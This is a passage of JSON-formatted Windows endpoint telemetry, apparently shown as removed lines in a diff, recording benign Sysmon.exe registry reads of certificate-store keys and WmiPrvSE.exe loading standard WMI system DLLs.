"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncobjapi.dll", - "image_path": "C:\\Windows\\System32\\ncobjapi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488860000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wbemsvc.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", - "pid": 4036, - "process_name": 
"WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "wmiutils.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 4036, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573489170000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPerfInst.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfInst.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 